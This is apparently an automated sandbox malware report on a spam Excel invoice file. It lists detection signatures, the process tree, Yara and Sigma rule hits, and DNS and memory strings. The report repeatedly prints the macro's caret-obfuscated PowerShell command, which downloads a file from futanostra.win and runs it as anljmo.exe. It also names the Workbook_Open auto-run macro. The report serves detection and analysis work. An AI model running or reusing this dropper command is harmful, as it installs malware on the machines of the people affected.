
Windows Analysis Report
fattura_062 (1).xls

Overview

General Information

Sample name: fattura_062 (1).xls
Analysis ID: 1546100
MD5: e1f70fa36ceace829772dcb7acb96d39
SHA1: 170ed63ed2926a386705365c77832c15af6c8228
SHA256: 7d763d40795a161b3378f30a073285ba036aa5452ad6c78208a307c8cb9b3c47
Tags: SPAM-ITA, xls, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Machine Learning detection for sample
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Yara detected Obfuscated Powershell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3488 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 3588 cmdline: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 3636 cmdline: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe) MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.412257968.0000000000320000.00000004.00000020.00020000.00000000.sdmp | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x26e4:$r1: p^Ow^ERS^hel^l
  • 0x331e:$r1: p^Ow^ERS^hel^l
  • 0x26e4:$r2: p^Ow^ERS^hel^l
  • 0x331e:$r2: p^Ow^ERS^hel^l
00000002.00000002.412257968.000000000035E000.00000004.00000020.00020000.00000000.sdmp | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x5e94:$r1: p^Ow^ERS^hel^l
  • 0x5e94:$r2: p^Ow^ERS^hel^l
00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security
00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x1fcb:$r1: p^Ow^ERS^hel^l
  • 0x1fcb:$r2: p^Ow^ERS^hel^l
Process Memory Space: cmd.exe PID: 3588 | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x13e3:$r1: p^Ow^ERS^hel^l
  • 0x170b:$r1: p^Ow^ERS^hel^l
  • 0x240a:$r1: p^Ow^ERS^hel^l
  • 0x390f:$r1: p^Ow^ERS^hel^l
  • 0x13e3:$r2: p^Ow^ERS^hel^l
  • 0x170b:$r2: p^Ow^ERS^hel^l
  • 0x240a:$r2: p^Ow^ERS^hel^l
  • 0x390f:$r2: p^Ow^ERS^hel^l

    System Summary

    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3588, ParentProcessName: cmd.exe, ProcessCommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs 
$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), ProcessId: 3636, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", CommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3488, ParentProcessName: EXCEL.EXE, ProcessCommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess 
''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", ProcessId: 3588, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3588, ParentProcessName: cmd.exe, ProcessCommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs 
$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), ProcessId: 3636, ProcessName: powershell.exe
    Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3636, TargetFilename: C:\Users\user\Documents\anljmo.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3588, ParentProcessName: cmd.exe, ProcessCommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs 
$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), ProcessId: 3636, ProcessName: powershell.exe
    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3636, TargetFilename: C:\Users\user\AppData\Local\Temp\we0q1c3n.dql.ps1
    No Suricata rule has matched


    AV Detection

    Source: fattura_062 (1).xls | Avira: detected
    Source: fattura_062 (1).xls | ReversingLabs: Detection: 86%
    Source: fattura_062 (1).xls | Joe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: CallSite.Target.pdb | source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdbpdbtem.pdbltW | source: powershell.exe, 00000004.00000002.410988470.000000001AA52000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb | source: powershell.exe, 00000004.00000002.411259916.000000001C30B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: b.pdbpdblib.pdb | source: powershell.exe, 00000004.00000002.411259916.000000001C300000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ??\C:\Windows\mscorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb | source: powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
    Source: global traffic | DNS query: name: futanostra.win
    Source: unknown | DNS traffic detected: query: futanostra.win replaycode: Name error (3)
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: global traffic | DNS traffic detected: DNS query: futanostra.win
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: powershell.exe, 00000004.00000002.410988470.000000001AADD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: powershell.exe, 00000004.00000002.408115766.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
    Source: powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
    Source: powershell.exe, 00000004.00000002.408115766.0000000002371000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: fattura_062 (1).xls | String found in binary or memory: https://futanostra.wi
    Source: powershell.exe, 00000004.00000002.408115766.0000000002572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://futanostra.win
    Source: powershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://futanostra.win/foglio.fu
    Source: powershell.exe, 00000004.00000002.408115766.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408045417.0000000000444000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmp, fattura_062 (1).xls, fattura_062 (1).xls.0.dr, 58230000.0.dr | String found in binary or memory: https://futanostra.win/foglio.ful
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0

    System Summary

    Source: 00000002.00000002.412257968.0000000000320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000002.00000002.412257968.000000000035E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: Process Memory Space: cmd.exe PID: 3588, type: MEMORYSTR | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: fattura_062 (1).xls.0.dr | OLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
    Source: 58230000.0.dr | OLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_000007FE8B61356E
    Source: fattura_062 (1).xls | OLE, VBA macro line: Sub Workbook_Open()
    Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, Name: Workbook_Open
    Source: fattura_062 (1).xls.0.dr | OLE, VBA macro line: Sub Workbook_Open()
    Source: 58230000.0.dr | OLE, VBA macro line: Sub Workbook_Open()
    Source: fattura_062 (1).xls | OLE indicator, VBA macros: true
    Source: fattura_062 (1).xls.0.dr | OLE indicator, VBA macros: true
    Source: 58230000.0.dr | OLE indicator, VBA macros: true
    Source: 58230000.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/__SRP_0' : https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)$function:maltibaloQ0r^ 1 -W^.aQb1.a"function:magarajeQ"4.function:poltergeystoreZQY53.aQ"8sS.aQ#9.aQ!7D.xQ<T.a function:tuplook^hel^^U^Ec^ERSwOt -NoIe^XsO^^Ni^Nt^.l$-NoO^w*function:molibdensefe^e$function:vangafootrF$function:footballr-$function:chivasgoas$a^YAB^S^*function:glientveiuun"QESfIx8<QLQPU&mFparam::type:QOQJZ:value:WriteString().a&mF&mF$obin.base64dataTypenodeTypedValueTextQT",CloseF~M#%(FLpKBH)DFWorks
    Source: 00000002.00000002.412257968.0000000000320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000002.00000002.412257968.000000000035E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: Process Memory Space: cmd.exe PID: 3588, type: MEMORYSTR | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: classification engine | Classification label: mal100.expl.evad.winXLS@5/12@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\58230000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC3AB.tmp
    Source: fattura_062 (1).xls | OLE indicator, Workbook stream: true
    Source: fattura_062 (1).xls.0.dr | OLE indicator, Workbook stream: true
    Source: 58230000.0.dr | OLE indicator, Workbook stream: true
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .."..............P................'.......'.....}..w.............................1......(.P..............3........".............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cm......................tR.l....}..w............\.......................(.P......................@..............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................n.o.t. .b.e. .r.e.s.o.l.v.e.d.:. .'.f.u.t.a.n.o.s.t.r.a...w.i.n.'.".............h?......D.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cm......................tR.l....}..w............\.......................(.P......................@..............................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1. .\......S.l......k.....(.P.....................h?...... .......................
